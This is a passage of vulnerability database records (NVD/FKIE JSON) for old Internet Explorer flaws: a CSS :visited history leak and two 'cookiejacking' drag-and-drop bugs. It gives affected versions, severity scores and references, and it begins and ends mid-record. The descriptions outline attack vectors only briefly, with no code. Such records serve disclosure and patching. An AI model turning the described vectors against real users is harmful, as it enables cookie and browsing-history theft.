"matchCriteriaId": "9030923C-356E-4FAB-8E64-03D462B4DB5F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.3110.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DC0FFABC-8BED-4838-85FE-406DC9CF9B92",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.3612.1713:*:*:*:*:*:*:*",
"matchCriteriaId": "C9DB4A00-4F70-4189-81BD-9318C52DF2D2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5:*:*:*:*:*:*:*",
"matchCriteriaId": "B4071D03-D955-4C1B-ACD8-A864F7D0FA02",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E6B8985B-B927-4928-B1DB-18E29F796992",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "3A04FEA6-37B0-44B0-844F-55652ABA1F85",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "4D56FB8E-2553-47C1-82A2-9E59023780CE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp2:*:*:*:*:*:*",
"matchCriteriaId": "8541EEED-94F4-42F8-9719-57F3EC85D52B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp3:*:*:*:*:*:*",
"matchCriteriaId": "40372520-08CF-4F64-A7AC-7E0AE0964138",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp4:*:*:*:*:*:*",
"matchCriteriaId": "2EB39B99-91A0-4B70-B12A-BA37F6AFBA83",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.0518.10:*:*:*:*:*:*:*",
"matchCriteriaId": "FBFE8C8E-F46C-4179-AE83-CE4720C8E0E9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.0910.1309:*:*:*:*:*:*:*",
"matchCriteriaId": "61125B09-23AA-4D5A-8332-6B5CCD80C7A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2014.0216:*:*:*:*:*:*:*",
"matchCriteriaId": "3AECF59F-B3C0-44CC-B77A-30E32B3E8BB5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2314.1003:*:*:*:*:*:*:*",
"matchCriteriaId": "D4690B85-86B9-448E-9249-B3885DEDC60E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2516.1900:*:*:*:*:*:*:*",
"matchCriteriaId": "4E215C82-E4AD-4B87-92D8-DD4D486EB6EF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2614.3500:*:*:*:*:*:*:*",
"matchCriteriaId": "D91F4C80-3B1B-45BD-966F-C9DBF98B875D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.800:*:*:*:*:*:*:*",
"matchCriteriaId": "F65E0DC1-40F6-4252-945A-A972343D1E29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.3800:*:*:*:*:*:*:*",
"matchCriteriaId": "8C07C1A9-1A94-4653-8C57-6FCFC25854E4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.6307:*:*:*:*:*:*:*",
"matchCriteriaId": "EDC57519-AD96-4ECF-A5B2-4E45F7D55298",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2920.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "37DE3DE6-A355-41F2-BF5E-E7526449E753",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3103.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "5DB24B4F-44FF-4F0F-90FA-240A34B9599F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3105.0106:*:*:*:*:*:*:*",
"matchCriteriaId": "919A6551-DB18-49BD-AB92-4C453B3B728F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3314.2101:*:*:*:*:*:*:*",
"matchCriteriaId": "C512DAB3-2720-42D2-B27E-28F30FE0FE46",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3315.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "CB90458F-1F2B-4F4C-88C6-4B670787D126",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3502.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "6C2EFDB4-97C2-4DDF-8A65-FCFB60FCB540",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3700.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "4A99CDC7-9341-4DFB-BB18-FF06C05FF9B0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:*:*:*:*:*:*:*",
"matchCriteriaId": "6219D36E-9E2C-4DC7-8FD5-FAD144A333F6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B1CFF390-FF33-45CA-BC96-C6766491C616",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp1:*:*:*:*:*:*",
"matchCriteriaId": "3BFFB565-F656-43E3-89E1-E412DC4C9D41",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp2:*:*:*:*:*:*",
"matchCriteriaId": "BD3A3282-8842-4708-AF7B-0AFBEB5D4F9A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp3:*:*:*:*:*:*",
"matchCriteriaId": "F4336F0E-75FE-4592-9D98-4F689804956E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp4:*:*:*:*:*:*",
"matchCriteriaId": "F3F2A51E-2675-4993-B9C2-F2D176A92857",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "DA6E5E4B-9E95-4019-8622-6E707FEC2FF6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "40F8042F-C621-45AE-9F8C-70469579643A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:preview:*:*:*:*:*:*",
"matchCriteriaId": "8E93C22E-812E-4CDA-9850-2386CE1E817A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp1:*:*:*:*:*:*",
"matchCriteriaId": "2CD04E07-3664-4D4F-BF3E-6B33AF0F2D12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp2:*:*:*:*:*:*",
"matchCriteriaId": "D05ED9D0-CF78-4FAD-9371-6FB3D5825148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.3825.1300:*:*:*:*:*:*:*",
"matchCriteriaId": "8BA6BA38-8B3B-4B9A-95BF-BCD412DD83B6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4030.2400:*:*:*:*:*:*:*",
"matchCriteriaId": "01BD2A05-3FCE-4C5D-8228-968630F27E28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4134.0100:*:*:*:*:*:*:*",
"matchCriteriaId": "4430779C-C678-4950-AE9E-82CDFC1A08D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4134.0600:*:*:*:*:*:*:*",
"matchCriteriaId": "BF0EC334-AEAD-43CA-A609-C027060F4F20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4308.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "BAF320BE-F022-4E0E-9815-B8AEED87B384",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4522.1800:*:*:*:*:*:*:*",
"matchCriteriaId": "75532B2D-6814-4D20-8AEB-E7DFD66B6423",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4807.2300:*:*:*:*:*:*:*",
"matchCriteriaId": "83802E30-8E7D-4CAB-B8FC-10056CF833D6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*",
"matchCriteriaId": "693D3C1C-E3E4-49DB-9A13-44ADDFF82507",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"matchCriteriaId": "D47247A3-7CD7-4D67-9D9B-A94A504DA1BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A19F6133-25D1-44A5-B6B9-354703436783",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2462.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "314538E8-48EC-4869-9074-2A1F5B7CBB3C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2479.0006:*:*:*:*:*:*:*",
"matchCriteriaId": "F56B3A72-7C5E-4F0C-BBC7-AA13DDFBEE70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"matchCriteriaId": "68656E52-AD8A-474E-9160-CD5F8857254B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2600.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "6876CE89-AA70-44C5-8A69-E2ED7A63F570",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"matchCriteriaId": "93F47C82-E767-47A8-88DE-417B004ED7FC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "F86E7189-CE21-4007-A3FA-39A6B51A5AB9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE2555F-C4BE-482F-8DD9-976D2026058C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "7B90EA4B-DA10-44B7-BD3D-6AE1197212D5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "7CBF9B51-5AF4-4317-9768-21D866AC7990",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "61F352FE-C22E-4B33-A46F-77A164B5DABB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3663.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "5ACD5A44-0926-4A1B-9900-1E7CC0A561C8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3718.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "196CEE37-2E3A-41A7-9AC1-0D5CC3F35D8F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "3E16BEF4-71AA-4E23-B438-D25FFABDB646",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.1830:*:*:*:*:*:*:*",
"matchCriteriaId": "1F32702E-F955-4DDB-B235-7C47E882453C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.3959:*:*:*:*:*:*:*",
"matchCriteriaId": "6FA2B4AD-C04D-4A6B-8570-5A2F5489F750",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*",
"matchCriteriaId": "1A33FA7F-BB2A-4C66-B608-72997A2BD1DB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6BC71FD8-D385-4507-BD14-B75FDD4C79E6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta:*:*:*:*:*:*",
"matchCriteriaId": "506711D9-6E57-4EED-8628-36C7F2324040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "ED471260-0272-431F-A91E-AC2883D92497",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "63D18070-EC48-4904-9AE0-558F7F3B869D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta3:*:*:*:*:*:*",
"matchCriteriaId": "86584E3F-3B0D-4018-A186-E59F3B01CA5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730:unknown:gold:*:*:*:*:*",
"matchCriteriaId": "817636ED-5E42-460E-89F1-24D5C64AB8BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730.11:*:*:*:*:*:*:*",
"matchCriteriaId": "0E6E1020-1017-4670-9316-27C79F1E2698",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.5730.1100:*:*:*:*:*:*:*",
"matchCriteriaId": "37F63AE1-8FC9-4C0F-8D19-F17DFA214E94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16386:*:*:*:*:*:*:*",
"matchCriteriaId": "35B1186A-FA5B-4E49-8C2F-BCD2D45F22A2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16441:*:*:*:*:*:*:*",
"matchCriteriaId": "53D75496-8594-44DB-B5C4-EA3CABD6551A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8.0.6001:*:*:*:*:*:*:*",
"matchCriteriaId": "5F709B61-F64B-4E8F-80BB-4944485B6125",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8.0.6001:beta:*:*:*:*:*:*",
"matchCriteriaId": "612B8367-DAEF-4EE3-BC57-16A5CF4D3030",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264."
},
{
"lang": "es",
"value": "La implementaci\u00f3n de las Hojas de Estilo en Cascada (CSS) en Microsoft Internet Explorer, no controla correctamente el :visited pseudo-class, lo que permite a atacantes remotos obtener informaci\u00f3n sensible acerca de las p\u00e1ginas web visitadas a trav\u00e9s de un documento HTML manipulado. Relacionado con CVE-2010-2264."
}
],
"id": "CVE-2002-2435",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2011-12-07T19:55:00.987",
"references": [
{
"source": "cve@mitre.org",
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2011-2383
Vulnerability from fkie_nvd - Published: 2011-06-03 17:55 - Updated: 2025-04-11 00:51
Severity ?
Summary
Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a "cookiejacking" issue, aka "Drag and Drop Information Disclosure Vulnerability." NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| microsoft | ie | 9 | |
| microsoft | internet_explorer | * | |
| microsoft | internet_explorer | 3.0 | |
| microsoft | internet_explorer | 4.0 | |
| microsoft | internet_explorer | 5 | |
| microsoft | internet_explorer | 6 | |
| microsoft | internet_explorer | 7 | |
| microsoft | internet_explorer | 8 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:9:beta:*:*:*:*:*:*",
"matchCriteriaId": "4594B15E-22ED-4DDE-B35A-2CF8F4629729",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4FF2A1DF-843B-4276-AC4E-EF6BC3CACCA9",
"versionEndIncluding": "9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1BBF9241-A175-438C-A793-3D245BE2AE35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A5B815D9-BC21-4A17-AF00-B8AD181027D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5:*:*:*:*:*:*:*",
"matchCriteriaId": "B4071D03-D955-4C1B-ACD8-A864F7D0FA02",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*",
"matchCriteriaId": "693D3C1C-E3E4-49DB-9A13-44ADDFF82507",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*",
"matchCriteriaId": "1A33FA7F-BB2A-4C66-B608-72997A2BD1DB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*",
"matchCriteriaId": "A52E757F-9B41-43B4-9D67-3FEDACA71283",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue, aka \"Drag and Drop Information Disclosure Vulnerability.\" NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release."
},
{
"lang": "es",
"value": "Microsoft Internet Explorer versi\u00f3n 9 y anteriores, no restringen apropiadamente las acciones de arrastrar y soltar en zona cruzada, lo que permite a los atacantes remotos asistidos por el usuario leer archivos de cookies por medio de vectores que involucran un elemento IFRAME con un atributo SRC que contiene una URL http: que redirecciona hacia URL file:, como es demostrado por un juego de Facebook, relacionado con un problema de \"cookiejacking\", tambi\u00e9n se conoce como \"Drag and Drop Information Disclosure Vulnerability\". NOTA: esta vulnerabilidad se presenta debido a una correcci\u00f3n incompleta en la versi\u00f3n 9 de Internet Explorer."
}
],
"id": "CVE-2011-2383",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2011-06-03T17:55:00.840",
"references": [
{
"source": "cve@mitre.org",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"source": "cve@mitre.org",
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"source": "cve@mitre.org",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"source": "cve@mitre.org",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"source": "cve@mitre.org",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"source": "cve@mitre.org",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"source": "cve@mitre.org",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"source": "cve@mitre.org",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"source": "cve@mitre.org",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"source": "cve@mitre.org",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"source": "cve@mitre.org",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"source": "cve@mitre.org",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2011-2382
Vulnerability from fkie_nvd - Published: 2011-06-03 17:55 - Updated: 2025-04-11 00:51
Severity ?
Summary
Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a "cookiejacking" issue.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:9:beta:*:*:*:*:*:*",
"matchCriteriaId": "4594B15E-22ED-4DDE-B35A-2CF8F4629729",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CB024757-60F3-44F9-BCFF-04B2F109D7A2",
"versionEndIncluding": "8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1BBF9241-A175-438C-A793-3D245BE2AE35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "F62AC866-A06F-47DB-AEDF-E345CE0B14A4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "943D5C5C-FC49-4EDE-AE75-A79CFF42208E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "59EB6841-0427-479B-8771-06DF62EE3C87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "8873A08F-D4C7-46FC-8FE5-972644F85ADA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A5B815D9-BC21-4A17-AF00-B8AD181027D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "42502347-DD40-4F8C-9861-C0A88A3F8608",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "0AF9C64F-9A67-4BA9-A653-75507935E6EA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:sp2:*:*:*:*:*:*",
"matchCriteriaId": "C375A9AA-505B-444C-A45F-2BAAD0B2CD0D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.01:*:*:*:*:*:*:*",
"matchCriteriaId": "B9D82B89-456D-41CB-A894-B6A22FB4415D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "44FF4E47-AD75-42C7-BB84-42BBA46A58B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.01:sp1:*:*:*:*:*:*",
"matchCriteriaId": "2E21CE6E-2B33-4225-B1DC-C19F1D578040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.5:*:*:*:*:*:*:*",
"matchCriteriaId": "1B26CE22-E730-4247-853E-5E640DB3ECB5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.40.308:*:*:*:*:*:*:*",
"matchCriteriaId": "0A652453-AB5F-405C-ABDE-CE1B54FEACED",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.40.520:*:*:*:*:*:*:*",
"matchCriteriaId": "141080AB-48DE-4885-BAB6-6F0937ABD49B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1155:*:*:*:*:*:*:*",
"matchCriteriaId": "EB758D76-B7F6-4E87-B88D-620443655CA9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1158:*:*:*:*:*:*:*",
"matchCriteriaId": "28655AC5-1512-4F45-9963-CA26F73981CE",
"vulnerable": true
},
{
